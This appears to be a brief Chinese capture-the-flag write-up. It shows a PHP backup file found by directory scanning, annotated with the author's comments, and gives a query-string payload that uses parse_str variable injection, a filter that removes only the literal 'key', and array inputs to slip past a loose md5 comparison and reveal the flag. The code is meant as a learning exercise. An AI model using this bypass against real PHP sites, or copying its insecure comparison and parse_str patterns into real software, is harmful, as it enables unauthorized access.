目录扫描,找到index.php.bak
内容如下,备注自己加的
<?php
#引入flag.php
include_once "flag.php";
#设置不报错
ini_set("display_errors", 0);
#将地址栏?后面的字符截取后传入$str
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
#这个说明得用kkeyey或者kekeyy
$str = str_replace('key','',$str);
#查询字符串解析到变量,用于页面传参
parse_str($str);
#$key1[]=1 $key2[]=2
echo md5($key1);
echo md5($key2);
#属于MD5弱类型碰撞,使用数组绕过即可
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
#payload得出flag
#?kekeyy1[]=1&kekeyy2[]=2(即null==null)
?>